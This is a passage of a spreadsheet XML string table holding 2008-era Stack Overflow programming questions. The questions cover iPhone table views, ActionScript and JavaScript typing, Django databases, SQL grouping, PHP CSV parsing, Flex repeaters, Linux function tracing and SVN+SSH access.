    <t xml:space="preserve">&lt;p&gt;This one is a bit tedious in as far as explaining, so here goes. I'm essentially populating a tableView on the iPhone with multiple sections, and potentially multiple rows per section. To my understanding, it's best to have an array of arrays so that you can simply determine how many sections one has by sending a message to the top level array of count, then for rows per section, doing the same for the inner array(s).  My data is in the form of a dictionary. One of the key/value pairs in the dictionary determines where it will be displayed on the tableView.  An example is the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
  name: "bob",
  location: 3
}
{ 
  name: "jane",
  location: 50
}
{
  name: "chris",
  location: 3
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In this case I'd have an array with two subarrays. The first subarray would have two dictionaries containing bob and chris since they're both part of location 3. The second subarray would contain jane, since she is in location 50. What's my best bet in Cocoa populate this data structure? A hash table in C would probably do the trick, but I'd rather use the classes available in Cocoa.&lt;/p&gt;
&lt;p&gt;Thanks and please let me know if I need to further clarify.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to check if two objects are of the same type in Actionscript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to do this in Actionscript:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;typeof(control1) != typeof(control2)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to test if two objects are of the same type. This would work just fine in C#, but in Actionscript it doesnt. In fact it returns &lt;code&gt;'object'&lt;/code&gt; for both &lt;code&gt;typeof()&lt;/code&gt; expressions because thats the way Actionscript works.&lt;/p&gt;
&lt;p&gt;I couldn't seem to find an alternative by looking in the debugger, or on pages that describe &lt;code&gt;typeof()&lt;/code&gt; in Actionscript.&lt;/p&gt;
&lt;p&gt;Is there a way to get the actual runtime type?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Use of 'prototype' vs. 'this' in JavaScript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the difference between&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var A = function () {
    this.x = function () {
        //do something
    };
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var A = function () { };
A.prototype.x = function () {
    //do something
};
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Any DAL/ORM on GAE?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any Database Abstraction Layer (DAL) or Object Relational Mapper (ORM) that works on Google App Engine (GAE), and on normal relational databases (RDBS), other  than &lt;a href="http://www.web2py.com" rel="nofollow"&gt;web2py&lt;/a&gt;'s?&lt;/p&gt;
&lt;p&gt;If not, is anybody working on porting one of the existing DAL/ORM to GAE?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Remote Name could not be resolved</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;While accessing a webservice which is availbale at &lt;a href="http://recpushdata.cyndigo.com/jobs.asmx" rel="nofollow"&gt;http://recpushdata.cyndigo.com/jobs.asmx&lt;/a&gt;, I am getting this Exception. "Remote name could not be resolved"&lt;/p&gt;
&lt;p&gt;Any Suggesytion..what to do..&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Some keys not working with a Dojo Widget</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I tried to follow &lt;a href="http://mindtrove.info/articles/creating-an-accessible-internationalized-dojo-rating-widget/" rel="nofollow"&gt;the widget example by mindtrove's blog&lt;/a&gt;. Here is &lt;a href="http://mindtrove.info/html/rating-tutorial.html" rel="nofollow"&gt;the example demo page&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;There are some problems with this widget: left &amp;amp; right arrow keys, and home &amp;amp; end keys are not working in Firefox(I am using a Mac), and none of any keys are working if I load the example page in Safari. I am not sure if this is only my Mac's problem or not working on Mac at all.&lt;/p&gt;
&lt;p&gt;Here are some codes in the widget Rating.js:&lt;/p&gt;
&lt;pre&gt;
    _onKeyDown: function(event) {
        switch(event.keyCode) {
        case dojo.keys.UP_ARROW:
        case dojo.keys.RIGHT_ARROW:
            this.currentValue += 1
            this.currentValue = Math.min(this.currentValue, this.maximumValue);
            dojo.stopEvent(event);
            break;
        case dojo.keys.DOWN_ARROW:
        case dojo.keys.LEFT_ARROW:
            this.currentValue -= 1
            this.currentValue = Math.max(this.currentValue, this.minimumValue);
            dojo.stopEvent(event);
            break;
        case dojo.keys.HOME:
            this.currentValue = this.minimumValue;
            dojo.stopEvent(event);
            break;
        case dojo.keys.END:
            this.currentValue = this.maximumValue;
            dojo.stopEvent(event);
            break;
        }
        // refresh the display
        this._update();
    }
&lt;/pre&gt;
&lt;p&gt;As far as I can see, all the keys cought in this function event should work. I am not sure why some are not working.  By the way, I find out one thing interesting: for those keys (left, right, home &amp;amp; end) keys in Firefox, they works if I hold my shift key.&lt;/p&gt;
&lt;p&gt;I am not sure if the problem is a bug in the widget's codes or Dojo's bug in case of Mac?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>apply CSS dynamically in asp.net 2.0</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a scrolling div with Three linkbuttons and three differents divs. I need to apply CSS to active linkbutton  as soon as button is clicked.The codes used by me are:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected void btnNetwork_Click(object sender, EventArgs e)
    {
        this.btnForecast.CssClass = "li_1";
        this.btnBlog.CssClass = "li_2";
        this.btnNetwork.CssClass = "li_3_active";
        this.btnNetwork.ForeColor = System.Drawing.Color.White;
        lblMsg.Visible = false;
        BindGW("-----------------------------------");
        Forecast.Visible = false;
        Blog.Visible = false;
        Network.Visible = true;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks &amp;amp; Regards,&lt;/p&gt;
&lt;p&gt;Khushi&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DataGridView Filtering OnClick Event (C# WinForm)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to filter my datagridview by the value of my label.text on click event? That value is from my linq query:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dataSet.Tables[0].AsEnumerable().Where(c =&amp;gt; c.Field&amp;lt;int&amp;gt;("ageColumn") &amp;gt; 3 &amp;amp;&amp;amp;
     c.Field&amp;lt;int&amp;gt;("ageColumn") &amp;lt; 5).Count();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Let's just say the above query gives me 12 (label.text = 12), now when I click "12", I want my datagridview to ONLY show those 12 rows that meet my above query.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which RDBMS do you use with Django and why?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I recently switched a project from MySQL InnoDB to PostgreSQL, and I feel bigger lags when inserting and updating data with ajax. This may be subjective. I know the Django devs recommend postgres and I know psycopg2 is supposed to be faster than MysqlDB. Personaly I like the way postgres enforces database integrity, but am mostly worried about performance for this project. Want to hear other people's opinion on this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any tool that can upgrade .NET 1.1 WinForm code to .NET 2.0 "style"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I mean a tool that can extract certain contents from old .NET 1.1 WinForm code and put it in .designer file (make it looks like .net 2.0 WinForm code). This also involves an update to the project file (.csproj/.vbproj)..&lt;/p&gt;
&lt;p&gt;If no existing tool yet, any tip or pointer on how to do this by programming?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DropDownList.SelectedValue changes (as a child control in a FormView) aren't sticking</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Okay, I have a FormView with a couple of child controls in an InsertItemTemplate. One of them is a DropDownList, called DdlAssigned. I reference it in the Page's OnLoad method like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected void Page_Load(object sender, EventArgs e)
{
    ((DropDownList)FrmAdd.FindControl("DdlAssigned")).SelectedValue =
          ((Guid)Membership.GetUser().ProviderUserKey).ToString();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Basically I'm just setting the default value of the DropDownList to the user currently logged in.&lt;/p&gt;
&lt;p&gt;Anyway, when the page finishes loading the SelectedValue change isn't reflected on the page. I stepped through OnLoad and I can see the change reflected in my Watch list, but when all is said and done nothing's different on the page.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Admin generic inlines for multi-table subclassed models broken --- any alternatives?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's what I'm trying to do, and failing...&lt;/p&gt;
&lt;p&gt;I have a File model which has a generic-relation to other objects:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class File(models.Model):
    content_type = models.ForeignKey(ContentType)
    object_id = models.PositiveIntegerField()
    content_object = generic.GenericForeignKey()
    file = models.FileField(upload_to='files/%Y/%m/%d')
    # etc....
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I also want to have a sub-class of File to deal with the specific case of images to be displayed in-page, rather than downloaded:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Image(File):
    file = models.ImageField(upload_to='files/%Y/%m/%d')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;All of the above works fine, including generic inlines of the File model, until I want to use a generic-inline of the Image model --- the save process fails to create the base class instance and so raises an error stating that the Image.file_ptr (the 'secret' foreign key to the base class) cannot be None.&lt;/p&gt;
&lt;p&gt;So, basically, generic inlines do not properly support multi-table inheritance at the moment.&lt;/p&gt;
&lt;p&gt;It's quite likely that I'm making this more complicated than it need be, so can anyone suggest either a fix for this problem, or a better way of achieving the same end?&lt;/p&gt;
&lt;p&gt;Please let me know if you need further clarification.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySQL A Search, A Select of multiple rows, Joining and all in one query</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am first doing a search on the table tags which results in all the rows returned together with their additional data from the table links (on which i do a join). The table tags works such that for an auto _id there can be multiple rows (1 tag per row so multiple tags is multiple rows). &lt;/p&gt;
&lt;p&gt;What I want to do is that instead of just getting multiple rows back which match the auto _id and query. I want to get each tag back for each auto_id that is found, in 1 row (some form of distinct but that puts all the tags comma seperated in 1 field), hence the group_concat (which obviously is not working at the moment - i've added it as pseudo).&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT ta.auto_id, li.address, li.title, GROUP_CONCAT(SELECT tag FROM tags WHERE auto_id = ta.auto_id)
FROM `tags` AS ta
JOIN
links AS li
ON ta.auto_id = li.auto_id
GROUP BY ta.tag
WHERE ta.user_id = 1
AND (ta.tag LIKE '%query%')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I hope I've made my case clear.&lt;/p&gt;
&lt;p&gt;Thank you very much,&lt;/p&gt;
&lt;p&gt;Ice&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Content Delivery Network algorithms, examples, code</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What design considerations must be taken when writing software for content-distribution systems, such as managing the synchronisation and distribution of data, redirecting downloads to the nearest servers and so on?&lt;/p&gt;
&lt;p&gt;I am also looking for examples of open source CDN (content delivery network) software. I can think of two projects, &lt;a href="http://www.coralcdn.org/"&gt;CoralCDN&lt;/a&gt; and &lt;a href="http://labtel.ing.uniroma1.it/opencdn/"&gt;OpenCDN&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Please note that there is more to a CDN than just hardware bandwidth. A CDN is a combination of software &lt;em&gt;and&lt;/em&gt; hardware. &lt;/p&gt;
&lt;p&gt;What I would like to go for, is software for streaming media as well as static assets. I'm having trouble figuring out how to properly synch streaming media across servers (since the file access can be fairly random), while static assets seem a little bit easier, as it's a one time request.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>problem with PHP reading CSV files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to read data from a.csv file to ouput it on a webpage as text.&lt;/p&gt;
&lt;p&gt;It's the first time I'm doing this and I've run into a nasty little problem.&lt;/p&gt;
&lt;p&gt;My .csv file(which gets openened by Excel by default), has multiple rows and I read the entire thing as one long string.&lt;/p&gt;
&lt;p&gt;like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$contents = file_get_contents("files/data.csv");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In this example file I made, there are 2 lines.&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Paul  Blueberryroad
  85    us	Flashlight,Bag	November 20,
  2008, 4:39 pm&lt;/p&gt;
  &lt;p&gt;Hellen    Blueberryroad
  85    us	lens13mm,Flashlight,Bag,ExtraBatteries	November
  20, 2008, 16:41:32&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;But the string read by PHP is this:&lt;/p&gt;
&lt;p&gt;Paul;Blueberryroad 85;us;Flashlight,Bag;November 20, 2008, 4:39 pmHellen;Blueberryroad 85;us;lens13mm,Flashlight,Bag,ExtraBatteries;November 20, 2008, 16:41:32&lt;/p&gt;
&lt;p&gt;I'm splitting this with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;list($name[], $street[], $country[], $accessories[], $orderdate[]) = split(";",$contents);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I want is for $name[] to contain "Paul" and "Hellen" as its contents. And the other arrays to receive the values of their respective columns.&lt;/p&gt;
&lt;p&gt;Instead I get only Paul and the content of $orderdate[] is&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;November 20, 2008, 4:39 pmHellen&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So all the rows are concatenated. Can someone show me how i can achieve what I need?&lt;/p&gt;
&lt;p&gt;EDIT: solution found, just one werid thing remaining:&lt;/p&gt;
&lt;p&gt;I've solved it now by using this piece of code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$fo = fopen("files/users.csv", "rb+");
while(!feof($fo)) {
  $contents[] = fgetcsv($fo,0,';');
}
fclose($fo);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For some reason, allthough my CSV file only has 2 rows, it returns 2 arrays and 1 boolean. The first 2 are my data arrays and the boolean is 0.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flex Help: Repeaters not repeating in an Accordian control</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am having a issue with databinding child repeaters inside an accordion control, hopefully you can help...&lt;/p&gt;
&lt;p&gt;I have an accordion in a ViewStack (of which,that ViewStack is also in another top-level ViewStack). I have a repeater in each child of the accordion control. The component looks like such:&lt;/p&gt;
&lt;pre&gt;
&lt;code&gt;
&amp;lt;mx:Box 
    xmlns:mx="http://www.adobe.com/2006/mxml"
    creationComplete="init()"
&amp;gt;
&amp;lt;mx:ViewStack&amp;gt
...
&amp;lt;mx:Accordion creationComplete="accordianInit()"&amp;gt;
    &amp;lt;mx:Box label=&amp;quot;Groups&amp;quot; width=&amp;quot;100%&amp;quot;&amp;gt;
        &amp;lt;mx:Repeater id=&amp;quot;rpGroups&amp;quot; width=&amp;quot;100%&amp;quot;&amp;gt;
            &amp;lt;mx:CheckBox id=&amp;quot;chkGroups&amp;quot; 
                label=&amp;quot;{rpGroups.currentItem.name}&amp;quot; /&amp;gt;
        &amp;lt;/mx:Repeater&amp;gt;
    &amp;lt;/mx:Box&amp;gt;
    &amp;lt;mx:Box label=&amp;quot;Contacts&amp;quot;&amp;gt;
        &amp;lt;mx:Repeater id=&amp;quot;rpContacts&amp;quot;&amp;gt;
            &amp;lt;mx:CheckBox id=&amp;quot;chkContacts&amp;quot; 
                label=quot;{rpContacts.currentItem.full_name}&amp;quot; /&amp;gt;
        &amp;lt;/mx:Repeater&amp;gt;
    &amp;lt;/mx:Box&amp;gt;
&amp;lt;/mx:Accordion&amp;gt;
...
&amp;lt;/mx:ViewStack&amp;gt
&amp;lt;mx:Box&gt;
&lt;/code&gt;
&lt;/pre&gt;
&lt;p&gt;The problem is that if I bind the 2 repeaters in the &lt;strong&gt;init&lt;/strong&gt; function, then both repeaters don't show any data. If I bind the repeaters in the &lt;strong&gt;accordianInit&lt;/strong&gt; function, then only the first repeater (rpGroups) gets databound...&lt;/p&gt;
&lt;p&gt;Where should I be data binding the repeaters so that both repeaters repeat properly?&lt;/p&gt;
&lt;p&gt;Hopefully this makes sense, if not I can elaborate more, any help is appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What should be in a 'technical work plan'?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm applying for grant to fund part of the development of a web app, one question I'm stuck on says to describe the: &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Tasks and full technical details and risks relating to your project, including detailed technical work plan&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Any guidance on what specific topics should be covered would be very gratefully received&lt;/p&gt;
&lt;p&gt;There is a separate question regarding the proposed methodology - but I have this covered&lt;/p&gt;
&lt;p&gt;Background info. - It's a rails projects and we've been using BDD (user stories) and XP&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to deal with a Many-To-Many Relation in my API</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two entities Foo and Bar with a Many to Many relationship between them.&lt;/p&gt;
&lt;p&gt;Let's say there is no semantic argument for why Foo might be "responsible" for the many to many relationship, but we arbitrarily decide that Foo is responsible for the relation (I.e., in NHibernate we would mark Bar as Inverse)&lt;/p&gt;
&lt;p&gt;That's all well and good from a DB perspective, but my entity APIs reveal a problem.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    // Responsible for the relation
    public class Foo
    {
        List&amp;lt;Bar&amp;gt; Bars = new List&amp;lt;Bar&amp;gt;();
        public void AddBar(Bar bar)
        {
            Bars.Add(bar);
            bar.AddFoo(this);
        }
    }
    public class Bar
    {
        List&amp;lt;Foo&amp;gt; Foos = new List&amp;lt;Foo&amp;gt;();
        // This shouldn't exist.
        public void AddFoo(Foo foo)
        {
            Foos.Add(foo);
            foo.AddBar(this); // Inf Recursion
        }
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If we've decided that Foo is responsible for this relationship, how do I update the associated collection in Bar without creating a public Bar.AddFoo() method which shouldn't even exist?&lt;/p&gt;
&lt;p&gt;I feel like I should be able to maintain the integrity of my domain model without resorting to having to reload these entities from the DB after an operation such as this.&lt;/p&gt;
&lt;p&gt;UPDATE: Code tweak inspired by commenter. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I sum a list&lt;&gt; of arrays</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a List&amp;lt; int[] &gt; myList, where I know that all the int[] arrays are the same length - for the sake of argument, let us say I have 500 arrays, each is 2048 elements long.  I'd like to sum all 500 of these arrays, to give me a single array, 2048 elements long, where each element is the sum of all the same positions in all the other arrays.&lt;/p&gt;
&lt;p&gt;Obviously this is trivial in imperative code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int[] sums = new int[myList[0].Length];
foreach(int[] array in myList)
{
    for(int i = 0; i &amp;lt; sums.Length; i++)
    {
        sums[i] += array[i];
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I was wondering if there was a nice Linq or Enumerable.xxx technique?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What language would people recommend as simple GUI that can be used as input to a script runing on Cygwin?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need a simple window with three input boxes and three labels (login name, password, and server node) and a button to execute the script. I do not want any third party programs that need to be installed on Windows. If it can be installed on Cygwin that would be great.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Viewing swf files in magazine format</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a set of swf files and can view them one at a time. However what I would like to is to view them in magazine format, as below:
First view is: swf file1 (magazine front cover)
Next view: swf file2 (magazine page 1) on left + swf file3 (magazine page 2) on right
Next view: swf file4 (magazine page 3) on left + swf file5 (magazine page 4) on right
Next view: swf file6 (magazine page 5) on left + swf file7 (magazine page 6) on right
etc
etc
Last view: swf filex (magazine back cover)&lt;/p&gt;
&lt;p&gt;So it's like flipping through a amagzine. This is what one can see on issuu.com
I'd like to get the software that will do this. Preferably free!  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Exit Edit Mode</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an array of objects which populate a UITableView. When a user removes the last object from the array, I automatically create a new "default" object. However, in the TableView, when the user gets there, the list is still in "Edit" mode. Is there a way for me to programatically set the TableView back to "normal" mode again?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tool to trace local function calls in Linux</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for a tool like &lt;a href="http://linux.die.net/man/1/ltrace"&gt;ltrace&lt;/a&gt; or &lt;a href="http://linux.die.net/man/1/strace"&gt;strace&lt;/a&gt; that can trace locally defined functions in an executable.  ltrace only traces dynamic library calls and strace only traces system calls.  For example, given the following C program:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;stdio.h&amp;gt;
int triple ( int x )
{
  return 3 * x;
}
int main (void)
{
  printf("%d\n", triple(10));
  return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Running the program with &lt;code&gt;ltrace&lt;/code&gt; will show the call to &lt;code&gt;printf&lt;/code&gt; since that is a standard library function (which is a dynamic library on my system) and &lt;code&gt;strace&lt;/code&gt; will show all the system calls from the startup code, the system calls used to implement printf, and the shutdown code, but I want something that will show me that the function &lt;code&gt;triple&lt;/code&gt; was called.  Assuming that the local functions have not been inlined by an optimizing compiler and that the binary has not been stripped (symbols removed), is there a tool that can do this?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;A couple of clarifications:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It is okay if the tool also provides trace information for non-local functions.&lt;/li&gt;
&lt;li&gt;I don't want to have to recompile the program(s) with support for specific tools, the symbol information in the executable should be enough.&lt;/li&gt;
&lt;li&gt;I would be really nice if I could use the tool to attach to existing processes like I can with ltrace/strace.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Resharper update namespace on all files in project</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know i can update my current files namespace to match the directory structure.  Can i do this all at once for all files in a project.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Custom accordion - using each</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to create a custom accordion for my page to that display my posts. I have it in list format using HTML and I am trying to create an effect when you click each header to expand to show more information.&lt;/p&gt;
&lt;p&gt;But I don't want to have say six blocks of code for six of the &lt;code&gt;&amp;lt;li&amp;gt;&lt;/code&gt; elements I have on the page.&lt;/p&gt;
&lt;p&gt;Is there a way to run it through .each(); perhaps? Instead of creating each section? Try a more dynamic approach.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get a div to float to the bottom of its container?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have floated images and inset boxes at the top of a container using float:right (or left) many times. Recently I hit a need to float a div at the bottom right corner of another div with the normal text wrap that you get with float (text wrapped above and to the left only).&lt;/p&gt;
&lt;p&gt;I thought this must be relatively easy even though float has no bottom value but I haven't been able to do it using a number of techniques and searching the web hasn't come up with anything other than using absolute positioning but this doesn't give the correct word wrap behaviour.&lt;/p&gt;
&lt;p&gt;I had thought this would be a very common design but apparently it isn't. If nobody has a suggestion I'll have to break my text up into separate boxes and align the div manually but that is rather precarious and I'd hate to have to do it on every page that needs it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Entity Framework pipeline: Expression trees to ESQL to SQL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the Entity Framework pipeline like?
What gets translated to SQL, Expression Trees or ESQL, or both?
Is ESQL something an Entity Framework provider needs to implement or translate, or that the framework takes care of?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MultiMap implementation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a simple IDictionary abstraction in C# that wraps a 
Dictionary&amp;lt;K, ICollection&amp;lt;V&amp;gt;&amp;gt;. Basically, it maps multiple values to one key.  I can't decide whether to remove a key and its empty list when the last item in a values list is removed, or leave it (to avoid instantiating a new collection if the key is reused) and do checks on a key's values' Count when determining whether a key exists.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where should a script block with jquery code be placed on an ASP.NET MVC Master Page?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Getting started with jquery and having trouble getting hello world type example going for asp.net mvc. I get a runtime error "object expected" when trying to load a page with this script. &lt;/p&gt;
&lt;p&gt;A. Where should script tags be placed in a master page?
B. What might I be doing wrong? There are definitely "a" elements in my page?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script src="../Scripts/jquery-1.2.6.min.js" type="text/javascript"&amp;gt;&amp;lt;/script&amp;gt;
            &amp;lt;script src="../Scripts/jquery.corner.js" type="text/javascript"&amp;gt;&amp;lt;/script&amp;gt;
            &amp;lt;script type="text/javascript"&amp;gt;
                $(document).ready(function() {
                    $("a").click(function(event) {
                        alert("Thanks for visiting!");
                    });
                });
            &amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Is VARCHAR like totally 1990s?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ol&gt;
&lt;li&gt;VARCHAR does not store Unicode characters.&lt;/li&gt;
&lt;li&gt;NVARCHAR does store Unicode characters.&lt;/li&gt;
&lt;li&gt;Today's applications should always be Unicode compatible.&lt;/li&gt;
&lt;li&gt;NVARCHAR takes twice the amount of space to store it.&lt;/li&gt;
&lt;li&gt;Point 4 doesn't matter because storage space is extremely inexpensive.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Ergo: When designing SQL Server databases today, one should always use NVARCHAR.&lt;/p&gt;
&lt;p&gt;Is this sound reasoning? Does anyone disagree with any of the premises?
Are there any reasons to choose VARCHAR over NVARCHAR today?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Proper MIME media type for PDF files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When working with PDFs, I've run across the MIME types &lt;code&gt;application/pdf&lt;/code&gt; and &lt;code&gt;application/x-pdf&lt;/code&gt; among others. &lt;/p&gt;
&lt;p&gt;Is there a difference between these two types, and if so what is it? Is one preferred over the other?&lt;/p&gt;
&lt;p&gt;I'm working on a web app which must deliver huge amounts of PDFs and I want to do it the correct way, if there is one.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Catch "The program stopped working" on Vista </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On Vista, I got a problem with the application crash handler. Basically, if something unexpected occurs which cannot be captured by SEH, I get this pop-up window with "The application stopped working", blablabla, "Close program/Debug program" -- that is, after I disable the error reporting using the system control panel. With error reporting enabled, you would get a task dialog with search for solution online, close, debug.&lt;/p&gt;
&lt;p&gt;This is not so funny if it happens in automated tools, and I wonder whether there is a way to get rid of it &lt;em&gt;totally&lt;/em&gt;, read, if my app crashes, it just crashes to the command line or disappears but does not bring up a dialog.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Differences between SVN and SVN+SSH on a Windows SVN server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to understand the differences in terms of subversion repository security between a regular svn:// and svn+ssh:// access.&lt;/p&gt;
&lt;p&gt;I've setup my subversion repository in a custom port and ip address and opened that same port on the firewall, and configured the repository with access only to authenticated users.&lt;/p&gt;
&lt;p&gt;From what I could understand, subversion svn:// access connects through the subversion port while svn+ssh:// connects to the ssh port to create a tunnel to the server (much like using PuTTY).&lt;/p&gt;
&lt;p&gt;I assume that the use for svn+ssh is the extra added security of not having the svn port open to the world or am I missing something else?&lt;/p&gt;
&lt;p&gt;&lt;b&gt;EDIT:&lt;/b&gt;
How is the svn+ssh:// command different than opening a PuTTY tunnel to my server and using svn://localhost/repository instead? I've read several articles on how to get subversion to get svn+ssh to work in windows but I can't make much sense of all. Opening a tunnel with PuTTY works just fine but I do have to remember to first open it before calling svn://localhost/repository.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Joins and where conditions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following (shortened query):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT 
    `Statistics`.`StatisticID`,
    COUNT(DISTINCT `Flags`.`FlagType`) AS `FlagCount`
FROM `Statistics`
LEFT JOIN `Flags` ON `Statistics`.`StatisticID` = `Flags`.`StatisticID`
WHERE `FlagCount` = 0
GROUP BY `Statistics`.`StatisticID`
ORDER BY `SubmittedTime` DESC
LIMIT 0, 10
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, neither &lt;code&gt;FlagCount = 0&lt;/code&gt; or &lt;code&gt;COUNT(Flags.FlagType)&lt;/code&gt; work in the &lt;code&gt;WHERE&lt;/code&gt; clause. I thought about using a &lt;code&gt;SET&lt;/code&gt; but I'm not sure how I'd add that to the query. Any ideas?&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Script to add MSIUSEREALADMINDETECTION to MSI</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Anyone have a script (JScript, VBScript or similar) in the spirit of &lt;a href="http://blogs.msdn.com/astebner/archive/2007/05/28/2958062.aspx"&gt;this handy script&lt;/a&gt; but adding the &lt;a href="http://msdn.microsoft.com/en-us/library/aa816403(VS.85).aspx"&gt;MSIUSEREALADMINDETECTION&lt;/a&gt; property&lt;/p&gt;
&lt;p&gt;I know I could use Orca manually or with its transform feature, but would rather not go there.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are some of the drawbacks to using C-style strings?</t>
  </si>
  <si>
